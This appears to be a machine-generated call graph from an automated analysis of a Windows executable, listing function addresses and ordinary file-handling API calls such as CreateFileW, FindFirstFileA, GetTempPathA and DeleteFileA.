13765 4042c8 13764->13765 13765->13159 13766->13141 13767->13141 15905 405f5e 13768->15905 13772 4021c4 30 API calls 13771->13772 13773 401df3 13772->13773 13773->13245 13774->13272 13776 401d38 13775->13776 13777 402170 30 API calls 13776->13777 13778 40173e 13777->13778 13778->13254 13780 405886 __EH_prolog 13779->13780 13781 404d51 30 API calls 13780->13781 13782 405895 13781->13782 13783 405806 32 API calls 13782->13783 13784 4058a2 13783->13784 13785 403a9c ctype 29 API calls 13784->13785 13786 401753 13785->13786 13786->13282 13787->13304 13789 4021c4 30 API calls 13788->13789 13790 401805 13789->13790 13790->13346 13800 401a35 13799->13800 13801 401a39 13799->13801 13800->13236 15967 404c4a 13801->15967 13805 4045c7 13804->13805 13806 4045d9 13804->13806 13805->13806 13821 4046ab 13805->13821 13806->13577 13806->13578 13809 403ba6 __EH_prolog 13808->13809 13810 402170 30 API calls 13809->13810 13814 403bc9 13810->13814 13811 403c10 13812 401ce1 30 API calls 13811->13812 13815 403c26 13812->13815 13813 403be1 MultiByteToWideChar 13813->13811 13817 403bfb 13813->13817 13814->13811 13814->13813 13816 402170 30 API calls 13814->13816 13818 403a9c ctype 29 API calls 13815->13818 13816->13813 13825 413d3d RaiseException 13817->13825 13820 403c2e 13818->13820 13820->13582 13822 4046c1 13821->13822 13822->13822 13823 40243e 30 API calls 13822->13823 13824 4046d0 13823->13824 13824->13806 13825->13811 13827 4025ad __EH_prolog 13826->13827 13828 402170 30 API calls 13827->13828 13829 4025c9 13828->13829 13830 401db8 30 API calls 13829->13830 13831 4025d6 13830->13831 13832 401db8 30 API calls 13831->13832 13833 4025e0 13832->13833 13834 401db8 30 API calls 13833->13834 13835 4025ea 13834->13835 13836 401ce1 30 API calls 13835->13836 13837 4025f6 13836->13837 13838 403a9c ctype 29 API calls 13837->13838 13839 4025fe 13838->13839 13839->13588 13842 402218 __EH_prolog 13840->13842 13841 40224c 13844 402170 30 API calls 13841->13844 13842->13841 13843 402241 13842->13843 13845 401ce1 30 API calls 13843->13845 13846 40225f 13844->13846 13852 401105 13845->13852 13847 402170 30 API calls 13846->13847 13848 40226c 13847->13848 13849 401ce1 30 API calls 13848->13849 13850 4022a0 13849->13850 13851 403a9c ctype 29 API calls 13850->13851 13851->13852 13852->13600 13863 405b4c 13853->13863 13859 405bd7 13856->13859 13858 405c03 13858->13614 13859->13858 13915 405ba8 13859->13915 13920 40248c 13860->13920 13866 405b2f 13863->13866 13869 4059b3 13866->13869 13870 4059bd __EH_prolog 13869->13870 13871 405a25 13870->13871 13872 4059ce 13870->13872 13887 405a63 13871->13887 13874 401c80 30 API calls 13872->13874 13876 4059d9 AreFileApisANSI 13874->13876 13890 403d04 13876->13890 13877 405a30 CreateFileW 13878 405a53 13877->13878 13878->13614 13883 403a9c ctype 29 API calls 13884 405a17 13883->13884 13885 403a9c ctype 29 API calls 13884->13885 13886 405a1f 13885->13886 13886->13878 13888 405a6d FindCloseChangeNotification 13887->13888 13889 405a2c 13887->13889 13888->13889 13889->13877 13889->13878 13898 403c43 13890->13898 13893 40597a 13894 405a63 FindCloseChangeNotification 13893->13894 13895 405985 13894->13895 13896 405989 CreateFileA 13895->13896 13897 4059ae 13895->13897 13896->13897 13897->13883 13899 403c4d __EH_prolog 13898->13899 13900 40243e 30 API calls 13899->13900 13902 403c6f 13900->13902 13901 403cd3 13912 403d24 13901->13912 13902->13901 13903 403c90 WideCharToMultiByte 13902->13903 13905 40243e 30 API calls 13902->13905 13903->13901 13906 403cbe 13903->13906 13905->13903 13911 413d3d RaiseException 13906->13911 13909 403a9c ctype 29 API calls 13910 403cf0 13909->13910 13910->13893 13911->13901 13913 40243e 30 API calls 13912->13913 13914 403ce8 13913->13914 13914->13909 13916 405bb5 13915->13916 13919 405b7b ReadFile 13916->13919 13918 405bc6 13918->13859 13919->13918 13921 401eef 13920->13921 13922 4024a0 13920->13922 13921->13614 13923 40243e 30 API calls 13922->13923 13923->13921 13925 4051d2 __EH_prolog 13924->13925 13940 405268 13925->13940 13928 405243 13966 4051a4 13928->13966 13929 4051a4 SetFileAttributesA DeleteFileA 13931 4051e3 13929->13931 13931->13928 13931->13929 13934 4014d3 13931->13934 13935 403a9c ctype 29 API calls 13931->13935 13938 405268 30 API calls 13931->13938 13939 40522c GetLastError 13931->13939 13943 40511b 13931->13943 13957 4058cd 13931->13957 13965 40498d CreateDirectoryA 13931->13965 13932 40524b 13933 403a9c ctype 29 API calls 13932->13933 13933->13934 13934->13135 13934->13136 13935->13931 13938->13931 13939->13931 13939->13934 13941 40243e 30 API calls 13940->13941 13942 405281 13941->13942 13942->13931 13944 405125 __EH_prolog 13943->13944 13945 40243e 30 API calls 13944->13945 13946 405141 13945->13946 13971 40506f 13946->13971 13948 40514c 13956 405164 13948->13956 13976 4050e5 13948->13976 13949 403a9c ctype 29 API calls 13951 405191 13949->13951 13951->13931 13954 405170 13955 4050e5 33 API calls 13954->13955 13954->13956 13955->13956 13956->13949 13958 4058d7 __EH_prolog 13957->13958 13997 404d51 13958->13997 13963 403a9c ctype 29 API calls 13964 4058fd 13963->13964 13964->13931 13965->13931 13967 4051b0 13966->13967 13968 4051ac 13966->13968 14020 404bdc 13967->14020 13968->13932 13970 4051b8 13970->13932 13972 405083 GetTempPathA 13971->13972 13973 40507d 13971->13973 13975 405095 13972->13975 13974 40243e 30 API calls 13973->13974 13974->13972 13975->13948 13977 4051a4 2 API calls 13976->13977 13978 4050ee 13977->13978 13988 4050ab 13978->13988 13980 4050ff 13981 405111 13980->13981 13993 4052f9 13980->13993 13981->13956 13983 4047db 13981->13983 13984 4047e9 13983->13984 13985 4047ef GetWindowsDirectoryA 13983->13985 13987 40243e 30 API calls 13984->13987 13986 404802 13985->13986 13986->13954 13987->13985 13989 4050c0 13988->13989 13990 4050c8 GetTempFileNameA 13988->13990 13991 40243e 30 API calls 13989->13991 13992 4050dd 13990->13992 13991->13990 13992->13980 13994 405305 13993->13994 13996 405316 13993->13996 13995 40243e 30 API calls 13994->13995 13995->13996 13996->13981 13998 40243e 30 API calls 13997->13998 13999 404d68 13998->13999 14000 405806 13999->14000 14001 405810 __EH_prolog 14000->14001 14006 40553a 14001->14006 14007 40551a FindClose 14006->14007 14008 40554b 14007->14008 14009 405566 14008->14009 14010 40554f FindFirstFileA 14008->14010 14013 40551a 14009->14013 14010->14009 14011 40556a 14010->14011 14016 40557f 14011->14016 14014 405524 FindClose 14013->14014 14015 40552f 14013->14015 14014->14015 14015->13963 14017 4055bd 14016->14017 14018 4046ab 30 API calls 14017->14018 14019 4055da 14018->14019 14019->14009 14025 40489c SetFileAttributesA 14020->14025 14022 404be6 14023 404bea 14022->14023 14024 404bec DeleteFileA 14022->14024 14023->13970 14024->13970 14025->14022 14026->13628 14028 402170 30 API calls 14027->14028 14029 4081c8 14028->14029 14029->13634 14031 407f10 __EH_prolog 14030->14031 14032 407f67 14031->14032 14033 401c80 30 API calls 14031->14033 14035 401c80 30 API calls 14032->14035 14055 407f93 14032->14055 14034 407f4c 14033->14034 14073 408062 14034->14073 14039 407f78 14035->14039 14036 408018 14038 4042d6 ctype 34 API calls 14036->14038 14041 408027 14038->14041 14042 408062 35 API calls 14039->14042 14044 4042ad ctype 34 API calls 14041->14044 14045 407f87 14042->14045 14043 403a9c ctype 29 API calls 14043->14032 14047 408033 14044->14047 14048 403a9c ctype 29 API calls 14045->14048 14046 402ee1 30 API calls 14046->14055 14049 4042d6 ctype 34 API calls 14047->14049 14048->14055 14050 408045 14049->14050 14051 4042ad ctype 34 API calls 14050->14051 14052 408051 14051->14052 14052->13634 14053 401d7a 30 API calls 14053->14055 14055->14036 14055->14046 14055->14053 14056 403a9c 29 API calls ctype 14055->14056 14086 4081e7 14055->14086 14056->14055 14058 408252 __EH_prolog 14057->14058 14059 403a76 30 API calls 14058->14059 14060 40825d 14059->14060 14061 408274 14060->14061 14126 40828f 14060->14126 14063 4039df 30 API calls 14061->14063 14064 408280 14063->14064 14064->13634 14066 40209c __EH_prolog 14065->14066 14067 4042d6 ctype 34 API calls 14066->14067 14068 4020c0 14067->14068 14069 4042ad ctype 34 API calls 14068->14069 14070 4020cb 14069->14070 14071 403a9c ctype 29 API calls 14070->14071 14072 4020d3 14071->14072 14072->13634 14074 40806c __EH_prolog 14073->14074 14075 4042d6 ctype 34 API calls 14074->14075 14076 40807e 14075->14076 14077 402170 30 API calls 14076->14077 14078 408093 14077->14078 14079 4080ef 14078->14079 14081 4080de 14078->14081 14083 401db8 30 API calls 14078->14083 14096 403998 14078->14096 14080 403a9c ctype 29 API calls 14079->14080 14082 407f5b 14080->14082 14081->14079 14084 403998 30 API calls 14081->14084 14082->14043 14083->14078 14084->14079 14087 4081f1 __EH_prolog 14086->14087 14088 403a76 30 API calls 14087->14088 14089 4081fd 14088->14089 14090 408227 14089->14090 14091 401ce1 30 API calls 14089->14091 14093 4039df 30 API calls 14090->14093 14092 408217 14091->14092 14094 401ce1 30 API calls 14092->14094 14095 408238 14093->14095 14094->14090 14095->14055 14097 4039a2 __EH_prolog 14096->14097 14098 403a76 30 API calls 14097->14098 14099 4039ad 14098->14099 14100 4039c4 14099->14100 14101 401ce1 30 API calls 14099->14101 14104 4039df 14100->14104 14101->14100 14103 4039d0 14103->14078 14107 4042ff 14104->14107 14108 4039e7 14107->14108 14109 404307 14107->14109 14108->14103 14111 404327 14109->14111 14112 4043cb 14111->14112 14113 40433b 14111->14113 14112->14108 14114 404358 14113->14114 14123 413d3d RaiseException 14113->14123 14116 40437f 14114->14116 14124 413d3d RaiseException 14114->14124 14119 403a76 30 API calls 14116->14119 14121 4043a7 14116->14121 14118 403a9c ctype 29 API calls 14118->14112 14120 40438b 14119->14120 14120->14121 14125 413d3d RaiseException 14120->14125 14121->14118 14123->14114 14124->14116 14125->14121 14127 408299 __EH_prolog 14126->14127 14128 401ce1 30 API calls 14127->14128 14129 4082c0 14128->14129 14132 4082e8 14129->14132 14133 4082f2 __EH_prolog 14132->14133 14134 4042d6 ctype 34 API calls 14133->14134 14135 408319 14134->14135 14138 408334 14135->14138 14139 404327 30 API calls 14138->14139 14140 40834c 14139->14140 14141 4082d0 14140->14141 14142 4081e7 30 API calls 14140->14142 14141->14061 14142->14140 14144 403380 __EH_prolog 14143->14144 14145 402170 30 API calls 14144->14145 14146 40339c 14145->14146 14147 402170 30 API calls 14146->14147 14148 4033b1 14147->14148 14149 402170 30 API calls 14148->14149 14150 402f3e 14149->14150 14150->13647 14152 40311d __EH_prolog 14151->14152 14247 402ee1 14152->14247 14157 403141 14158 401d1b 30 API calls 14157->14158 14159 40314f 14158->14159 14161 403a9c ctype 29 API calls 14159->14161 14160 403158 14256 408f0a 14160->14256 14194 4031c1 14161->14194 14163 403198 14164 4042ad ctype 34 API calls 14163->14164 14165 4031a6 14164->14165 14166 4031c6 14165->14166 14167 4031ab 14165->14167 14168 401ce1 30 API calls 14166->14168 14169 401d1b 30 API calls 14167->14169 14170 4031d2 14168->14170 14169->14159 14171 405d0b 30 API calls 14170->14171 14172 4031de 14171->14172 14316 4049dd 14172->14316 14175 40322a 14177 401c80 30 API calls 14175->14177 14176 4031ea 14443 409569 14176->14443 14179 403237 14177->14179 14351 402685 14179->14351 14185 403a9c ctype 29 API calls 14187 403269 14185->14187 14358 40c231 14187->14358 14394 40bbc9 14187->14394 14191 403284 14193 403a9c ctype 29 API calls 14191->14193 14195 40328f 14193->14195 14194->13660 14200 403494 __EH_prolog 14199->14200 14201 403a9c ctype 29 API calls 14200->14201 14202 4034aa 14201->14202 15781 40341c 14202->15781 14205 403a9c ctype 29 API calls 14206 4034cc 14205->14206 14207 403a9c ctype 29 API calls 14206->14207 14208 401581 14207->14208 14208->13194 14208->13195 14210 4034ed __EH_prolog 14209->14210 14211 402170 30 API calls 14210->14211 14212 40351f 14211->14212 14213 402170 30 API calls 14212->14213 14214 403535 14213->14214 14215 402170 30 API calls 14214->14215 14216 40354b 14215->14216 14217 402170 30 API calls 14216->14217 14218 403564 14217->14218 15791 4035a6 14218->15791 14221 402170 30 API calls 14222 403589 14221->14222 14222->13654 15810 4148be 14223->15810 14226 413243 14226->13659 14227 413248 GetLastError 14228 413252 14227->14228 14228->13659 14230 4131e9 CloseHandle 14229->14230 14232 402fd0 14229->14232 14231 4131f4 GetLastError 14230->14231 14230->14232 14231->14232 14232->13667 14234 4030a7 __EH_prolog 14233->14234 14235 401d7a 30 API calls 14234->14235 14236 4030bc 14235->14236 15840 40620b 14236->15840 14240 4030d4 14241 40602f 33 API calls 14240->14241 14242 4030df 14241->14242 15860 406049 14242->15860 14245 403a9c ctype 29 API calls 14246 4030f5 ShowWindow 14245->14246 14246->13680 14248 402170 30 API calls 14247->14248 14249 402ef5 14248->14249 14250 405841 14249->14250 14251 40584b __EH_prolog 14250->14251 14451 4055de 14251->14451 14254 40551a FindClose 14255 40313d 14254->14255 14255->14157 14255->14160 14257 408f14 __EH_prolog 14256->14257 14258 403a76 30 API calls 14257->14258 14259 408f31 14258->14259 14260 408f43 14259->14260 14573 409184 14259->14573 14262 402170 30 API calls 14260->14262 14263 408f7a 14262->14263 14264 402170 30 API calls 14263->14264 14265 408f91 14264->14265 14266 402170 30 API calls 14265->14266 14267 408fa8 14266->14267 14268 40906f 14267->14268 14492 404e76 14267->14492 14547 408a3b 14268->14547 14273 408fd3 GetLastError 14277 403a9c ctype 29 API calls 14273->14277 14274 40900e 14278 401e3a 30 API calls 14274->14278 14275 4090a1 14279 403a9c ctype 29 API calls 14275->14279 14276 4090d5 14281 402634 30 API calls 14276->14281 14280 408fe3 14277->14280 14282 40901d 14278->14282 14284 4090a9 14279->14284 14285 403a9c ctype 29 API calls 14280->14285 14286 4090e4 14281->14286 14283 401d7a 30 API calls 14282->14283 14287 40902a 14283->14287 14288 403a9c ctype 29 API calls 14284->14288 14289 408feb 14285->14289 14290 403998 30 API calls 14286->14290 14291 403a9c ctype 29 API calls 14287->14291 14292 4090b1 14288->14292 14293 403a9c ctype 29 API calls 14289->14293 14294 4090f3 14290->14294 14296 409036 14291->14296 14297 403a9c ctype 29 API calls 14292->14297 14299 408ff3 14293->14299 14295 403a9c ctype 29 API calls 14294->14295 14305 4090ff 14295->14305 14298 401e19 30 API calls 14296->14298 14297->14299 14301 409046 14298->14301 14299->14163 14300 409135 14304 403a9c ctype 29 API calls 14300->14304 14303 401d7a 30 API calls 14301->14303 14302 402634 30 API calls 14302->14305 14306 409053 14303->14306 14307 409152 14304->14307 14305->14300 14305->14302 14308 403998 30 API calls 14305->14308 14313 403a9c ctype 29 API calls 14305->14313 14309 403a9c ctype 29 API calls 14306->14309 14310 403a9c ctype 29 API calls 14307->14310 14308->14305 14311 40905f 14309->14311 14312 40915a 14310->14312 14533 4092e9 14311->14533 14315 403a9c ctype 29 API calls 14312->14315 14313->14305 14315->14299 14317 4049e7 __EH_prolog 14316->14317 14318 401c80 30 API calls 14317->14318 14321 4049f6 14318->14321 14319 401ce1 30 API calls 14326 404a56 14319->14326 14321->14319 14332 404a38 14321->14332 14322 404a6d GetLastError 14324 404aea 14322->14324 14322->14326 14323 401d7a 30 API calls 14349 404b4e 14323->14349 14327 402ee1 30 API calls 14324->14327 14325 404bb2 14331 403a9c ctype 29 API calls 14325->14331 14326->14322 14326->14325 14341 401e3a 30 API calls 14326->14341 14342 404b41 14326->14342 14346 401d7a 30 API calls 14326->14346 14350 403a9c ctype 29 API calls 14326->14350 15141 40499c 14326->15141 14329 404af2 14327->14329 14328 403a9c ctype 29 API calls 14333 4031e6 14328->14333 14330 405841 37 API calls 14329->14330 14335 404b01 14330->14335 14331->14332 14332->14328 14333->14175 14333->14176 14334 404b05 14337 403a9c ctype 29 API calls 14334->14337 14335->14334 14336 404b35 14335->14336 14339 403a9c ctype 29 API calls 14336->14339 14340 404b1d 14337->14340 14338 401e3a 30 API calls 14338->14349 14339->14342 14343 403a9c ctype 29 API calls 14340->14343 14341->14326 14342->14323 14345 404b25 14343->14345 14344 40499c 34 API calls 14344->14349 14347 403a9c ctype 29 API calls 14345->14347 14346->14326 14347->14333 14348 403a9c ctype 29 API calls 14348->14349 14349->14325 14349->14338 14349->14344 14349->14348 14350->14326 14352 401d7a 30 API calls 14351->14352 14353 4026ac 14352->14353 14354 401d7a 30 API calls 14353->14354 14355 4026d8 14354->14355 14356 405d0b 30 API calls 14355->14356 14357 4026df 14356->14357 14357->14185 14359 40bdf7 14358->14359 14360 40be1c 14359->14360 14361 40be78 14359->14361 14363 403a76 30 API calls 14359->14363 14372 40be5b 14359->14372 14374 40bf45 14359->14374 14380 40ca4c 62 API calls 14359->14380 14382 40c0f3 14359->14382 14383 40c059 14359->14383 14384 40c0b5 14359->14384 14387 40c156 14359->14387 15161 40c73a 14359->15161 15165 40ad19 14359->15165 15277 40c5e8 14359->15277 14362 40c380 34 API calls 14360->14362 15151 40c380 14361->15151 14364 40be3c 14362->14364 14363->14359 14372->14191 14375 40c380 34 API calls 14374->14375 14377 40bf76 14375->14377 14378 4042d6 ctype 34 API calls 14377->14378 14380->14359 14385 40c380 34 API calls 14382->14385 14388 40c380 34 API calls 14383->14388 14389 40c380 34 API calls 14384->14389 14386 40c083 14385->14386 14390 4042d6 ctype 34 API calls 14386->14390 14391 40c380 34 API calls 14387->14391 14388->14386 14389->14386 14391->14386 14405 40bbd3 __EH_prolog 14394->14405 14395 40bc23 14395->14191 14396 40bd4e 14398 40bd90 14396->14398 14399 40bd63 14396->14399 14404 403a76 30 API calls 14398->14404 14400 4042d6 ctype 34 API calls 14399->14400 14401 40bd76 14400->14401 14402 40c46d 35 API calls 14402->14405 14427 40bdb4 14404->14427 14405->14395 14405->14396 14405->14402 14406 4042ad 34 API calls ctype 14405->14406 14407 40c413 30 API calls 14405->14407 15756 40c30e 14405->15756 15762 40c281 14405->15762 14406->14405 14407->14405 14427->14395 14444 409573 __EH_prolog 14443->14444 14445 40602f 33 API calls 14444->14445 14446 409585 14445->14446 15767 4094f6 14446->15767 14452 4055e8 __EH_prolog 14451->14452 14453 40551a FindClose 14452->14453 14454 4055f6 14453->14454 14455 40562c 14454->14455 14456 405607 FindFirstFileW 14454->14456 14457 40562e 14454->14457 14455->14254 14456->14455 14459 40561e 14456->14459 14458 401c80 30 API calls 14457->14458 14460 405639 AreFileApisANSI 14458->14460 14469 4056a6 14459->14469 14462 403d04 31 API calls 14460->14462 14463 405654 FindFirstFileA 14462->14463 14464 403a9c ctype 29 API calls 14463->14464 14465 40566e 14464->14465 14466 403a9c ctype 29 API calls 14465->14466 14467 40567a 14466->14467 14467->14455 14473 405705 14467->14473 14470 4056e4 14469->14470 14471 401d1b 30 API calls 14470->14471 14472 405701 14471->14472 14472->14455 14474 40570f __EH_prolog 14473->14474 14485 4052b2 14474->14485 14479 401d7a 30 API calls 14480 405794 14479->14480 14481 403a9c ctype 29 API calls 14480->14481 14482 40579c 14481->14482 14483 403a9c ctype 29 API calls 14482->14483 14484 4057a4 14483->14484 14484->14455 14486 4052c9 14485->14486 14487 40243e 30 API calls 14486->14487 14488 4052d8 AreFileApisANSI 14487->14488 14489 4057b5 14488->14489 14490 403b9c 31 API calls 14489->14490 14491 405787 14490->14491 14491->14479 14493 404e80 __EH_prolog 14492->14493 14494 404ea2 14493->14494 14495 404f2d 14493->14495 14497 404eb7 GetFullPathNameW 14494->14497 14499 402170 30 API calls 14494->14499 14496 40243e 30 API calls 14495->14496 14498 404f40 14496->14498 14500 404ed8 14497->14500 14581 4048ff 14498->14581 14499->14497 14500->14273 14500->14274 14505 403a9c ctype 29 API calls 14506 404f76 14505->14506 14507 404f8b 14506->14507 14508 404f7b 14506->14508 14596 405352 14507->14596 14509 403a9c ctype 29 API calls 14508->14509 14509->14500 14514 403a9c ctype 29 API calls 14515 404fb3 14514->14515 14602 405331 14515->14602 14518 404818 32 API calls 14519 404fd0 14518->14519 14520 403a9c ctype 29 API calls 14519->14520 14521 404fdc 14520->14521 14522 402634 30 API calls 14521->14522 14523 404ff1 14522->14523 14524 401d7a 30 API calls 14523->14524 14525 404ffd 14524->14525 14526 403a9c ctype 29 API calls 14525->14526 14534 4092f3 __EH_prolog 14533->14534 14535 401d7a 30 API calls 14534->14535 14536 409308 14535->14536 14537 402634 30 API calls 14536->14537 14538 409315 14537->14538 14539 405841 37 API calls 14538->14539 14540 409324 14539->14540 14541 403a9c ctype 29 API calls 14540->14541 14542 409338 14541->14542 14543 409352 14542->14543 14618 413d3d RaiseException 14542->14618 14545 4042d6 ctype 34 API calls 14543->14545 14546 40935a 14545->14546 14546->14268 14571 408a45 __EH_prolog 14547->14571 14548 408ea0 30 API calls 14548->14571 14549 408cfb 14551 405e34 VariantClear 14549->14551 14550 401d7a 30 API calls 14550->14571 14562 408a61 14551->14562 14552 408e75 14553 405e34 VariantClear 14552->14553 14553->14562 14555 408ce8 14729 4038c2 14555->14729 14556 4093f0 30 API calls 14556->14571 14560 408d0e 14561 4038c2 29 API calls 14560->14561 14561->14562 14562->14275 14562->14276 14564 408d55 14566 4038c2 29 API calls 14564->14566 14565 408dae 14568 4038c2 29 API calls 14565->14568 14566->14562 14568->14562 14569 408e06 14570 4038c2 29 API calls 14569->14570 14570->14562 14571->14548 14571->14549 14571->14550 14571->14552 14571->14555 14571->14556 14571->14560 14571->14562 14571->14564 14571->14565 14571->14569 14572 4038c2 29 API calls 14571->14572 14619 408902 14571->14619 14632 405e34 14571->14632 14636 40836d 14571->14636 14661 408524 14571->14661 14725 40848c 14571->14725 14572->14571 14574 40918e __EH_prolog 14573->14574 14575 402170 30 API calls 14574->14575 14576 4091c1 14575->14576 15138 40590e 14576->15138 14579 402170 30 API calls 14580 4091e2 14579->14580 14580->14260 14582 404909 __EH_prolog 14581->14582 14583 401c80 30 API calls 14582->14583 14584 40491c AreFileApisANSI 14583->14584 14585 403d04 31 API calls 14584->14585 14586 404936 14585->14586 14587 403a9c ctype 29 API calls 14586->14587 14588 40493e 14587->14588 14589 404df9 14588->14589 14590 404e26 GetFullPathNameA 14589->14590 14591 404e1e 14589->14591 14594 404e45 14590->14594 14592 40243e 30 API calls 14591->14592 14592->14590 14593 404e50 14593->14505 14594->14593 14595 404e5b lstrlenA 14594->14595 14595->14593 14605 40536e 14596->14605 14599 404818 AreFileApisANSI 14600 403b9c 31 API calls 14599->14600 14601 404839 14600->14601 14601->14514 14603 40536e 30 API calls 14602->14603 14604 404fc2 14603->14604 14604->14518 14607 405378 __EH_prolog 14605->14607 14606 4053ac 14609 40243e 30 API calls 14606->14609 14607->14606 14608 4053a1 14607->14608 14610 403d24 30 API calls 14608->14610 14611 4053bf 14609->14611 14612 404f99 14610->14612 14613 40243e 30 API calls 14611->14613 14612->14599 14614 4053cc 14613->14614 14615 403d24 30 API calls 14614->14615 14616 4053fa 14615->14616 14617 403a9c ctype 29 API calls 14616->14617 14617->14612 14618->14543 14620 40890c __EH_prolog 14619->14620 14621 408927 14620->14621 14622 40894b 14620->14622 14623 403a76 30 API calls 14621->14623 14625 403a76 30 API calls 14622->14625 14627 40892e 14622->14627 14623->14627 14624 408524 86 API calls 14626 4089b8 14624->14626 14628 408957 14625->14628 14626->14571 14627->14624 14736 406434 14628->14736 14631 408994 GetLastError 14631->14626 14633 405e39 14632->14633 14634 405e5a VariantClear 14633->14634 14635 405e71 14633->14635 14634->14571 14635->14571 14637 408377 __EH_prolog 14636->14637 14638 4083a3 14637->14638 14639 4083b6 14637->14639 14642 405e34 VariantClear 14638->14642 14640 4083cc 14639->14640 14641 4083bd 14639->14641 14645 4083ca 14640->14645 14646 40846a 14640->14646 14644 401d1b 30 API calls 14641->14644 14643 4083af 14642->14643 14643->14571 14644->14645 14648 405e34 VariantClear 14645->14648 14647 405e34 VariantClear 14646->14647 14647->14643 14649 4083ed 14648->14649 14649->14643 14650 401d7a 30 API calls 14649->14650 14651 4083fd 14650->14651 14652 408421 14651->14652 14653 40842c 14651->14653 14654 40844f 14651->14654 14657 405e34 VariantClear 14652->14657 14655 401db8 30 API calls 14653->14655 14654->14652 14656 40843f 14654->14656 14658 408435 14655->14658 14659 405e34 VariantClear 14656->14659 14657->14643 14739 407d25 14658->14739 14659->14643 14664 40852e __EH_prolog 14661->14664 14747 40455d 14664->14747 14665 402170 30 API calls 14667 408570 14665->14667 14666 4085c4 14668 4085df 14666->14668 14682 4085ef 14666->14682 14667->14666 14672 401e19 30 API calls 14667->14672 14669 4039df 30 API calls 14668->14669 14687 4085ea 14669->14687 14670 40863c 14673 408648 14670->14673 14670->14687 14790 4042eb 14670->14790 14674 4085ab 14672->14674 14677 4042ad ctype 34 API calls 14673->14677 14676 401d7a 30 API calls 14674->14676 14679 4085b8 14676->14679 14681 408742 14677->14681 14683 403a9c ctype 29 API calls 14679->14683 14680 4039df 30 API calls 14680->14682 14684 403a9c ctype 29 API calls 14681->14684 14682->14670 14682->14680 14783 4088ce 14682->14783 14787 404407 14682->14787 14683->14666 14685 40874a 14684->14685 14686 403a9c ctype 29 API calls 14685->14686 14699 408752 14686->14699 14687->14673 14688 40876b 14687->14688 14694 4087a1 14687->14694 14751 4065b2 14687->14751 14757 40d1ab 14687->14757 14777 40df69 14687->14777 14689 4042ad ctype 34 API calls 14688->14689 14690 408788 14689->14690 14691 403a9c ctype 29 API calls 14690->14691 14692 408790 14691->14692 14696 403a9c ctype 29 API calls 14692->14696 14693 4087f8 14695 405e34 VariantClear 14693->14695 14694->14673 14694->14693 14697 401d1b 30 API calls 14694->14697 14698 408804 14695->14698 14696->14699 14697->14693 14700 408879 14698->14700 14701 40881d 14698->14701 14699->14571 14702 4088ce 5 API calls 14700->14702 14703 401c80 30 API calls 14701->14703 14704 408884 14702->14704 14705 40882b 14703->14705 14707 407d82 35 API calls 14704->14707 14706 401c80 30 API calls 14705->14706 14708 408838 14706->14708 14709 4088a0 14707->14709 14793 407d82 14708->14793 14711 401d7a 30 API calls 14709->14711 14713 4088ad 14711->14713 14715 403a9c ctype 29 API calls 14713->14715 14714 401d7a 30 API calls 14716 40885c 14714->14716 14715->14673 14717 403a9c ctype 29 API calls 14716->14717 14718 408864 14717->14718 14726 408496 __EH_prolog 14725->14726 14727 405e34 VariantClear 14726->14727 14728 408511 14727->14728 14728->14571 14730 403a9c ctype 29 API calls 14729->14730 14731 4038cd 14730->14731 14732 403a9c ctype 29 API calls 14731->14732 14733 4038d5 14732->14733 14734 403a9c ctype 29 API calls 14733->14734 14735 4038dd 14734->14735 14735->14562 14737 405b6d 35 API calls 14736->14737 14738 406440 14737->14738 14738->14627 14738->14631 14740 407d3a 14739->14740 14743 4021c4 14740->14743 14744 402208 14743->14744 14745 4021d8 14743->14745 14744->14656 14746 402170 30 API calls 14745->14746 14746->14744 14749 40456d 14747->14749 14748 401e19 30 API calls 14750 404592 14748->14750 14749->14748 14750->14665 14752 4065c2 14751->14752 14753 4065bb 14751->14753 14803 405ace SetFilePointer 14752->14803 14753->14687 14758 40d1b5 __EH_prolog 14757->14758 14759 40df69 34 API calls 14758->14759 14760 40d208 14759->14760 14761 40d20e 14760->14761 14762 40d22f 14760->14762 14814 40d2cf 14761->14814 14810 40f8c3 14762->14810 14766 40d261 14820 40f4d8 14766->14820 14767 40d242 14769 40d2cf 34 API calls 14767->14769 14776 40d21a 14769->14776 14776->14687 14778 40df7a 14777->14778 14782 4065b2 3 API calls 14778->14782 14779 40df8e 14780 40df9e 14779->14780 15052 40dd8b 14779->15052 14780->14687 14782->14779 14784 4088d9 14783->14784 14786 4088f6 14783->14786 14785 403b4f ctype 5 API calls 14784->14785 14784->14786 14785->14784 14786->14682 14788 4042ff 30 API calls 14787->14788 14789 40440f 14788->14789 14789->14682 15069 40ba4f 14790->15069 14791 4042fc 14791->14687 14794 407d8c __EH_prolog 14793->14794 15103 407dd5 14794->15103 14797 40235e 30 API calls 14798 407db0 14797->14798 14799 401ce1 30 API calls 14798->14799 14800 407dbb 14799->14800 14801 403a9c ctype 29 API calls 14800->14801 14802 407dc3 14801->14802 14802->14714 14804 405b01 14803->14804 14805 405af7 GetLastError 14803->14805 14806 406534 14804->14806 14805->14804 14807 406538 14806->14807 14808 40653b GetLastError 14806->14808 14807->14753 14809 406545 14808->14809 14809->14753 14811 40f8cd __EH_prolog 14810->14811 14846 40f648 14811->14846 14815 40d2d9 __EH_prolog 14814->14815 14816 4042d6 ctype 34 API calls 14815->14816 14817 40d2fd 14816->14817 14818 4042ad ctype 34 API calls 14817->14818 14819 40d308 14818->14819 14819->14776 14821 4042d6 ctype 34 API calls 14820->14821 14822 40f4eb 14821->14822 14847 40f652 __EH_prolog 14846->14847 14886 40d377 14847->14886 14851 40f694 14852 40db47 RaiseException 14851->14852 14853 40f6c9 14851->14853 14852->14853 14861 40d23b 14853->14861 14885 4065b2 3 API calls 14853->14885 14854 40f720 14854->14861 14899 4076d5 14854->14899 14861->14766 14861->14767 14885->14854 14887 40d3d2 34 API calls 14886->14887 14888 40d37f 14887->14888 14889 4042d6 ctype 34 API calls 14888->14889 14890 40d38a 14889->14890 14891 4042d6 ctype 34 API calls 14890->14891 14892 40d395 14891->14892 14893 4042d6 ctype 34 API calls 14892->14893 14894 40d3a0 14893->14894 14895 4042d6 ctype 34 API calls 14894->14895 14896 40d3ab 14895->14896 14897 4042d6 ctype 34 API calls 14896->14897 14898 40d3b6 14897->14898 14898->14851 14959 40db47 14898->14959 14900 4076e2 14899->14900 14903 407716 14899->14903 14901 403a76 30 API calls 14900->14901 14904 4076ed ctype 14900->14904 14901->14904 14905 40776f 14903->14905 14960 413d3d RaiseException 14959->14960 14961 40db5f 14960->14961 14962 40db6f 14961->14962 14963 40db47 RaiseException 14961->14963 14962->14851 14963->14962 15053 40dd95 __EH_prolog 15052->15053 15054 40776f 2 API calls 15053->15054 15056 40ddae 15054->15056 15055 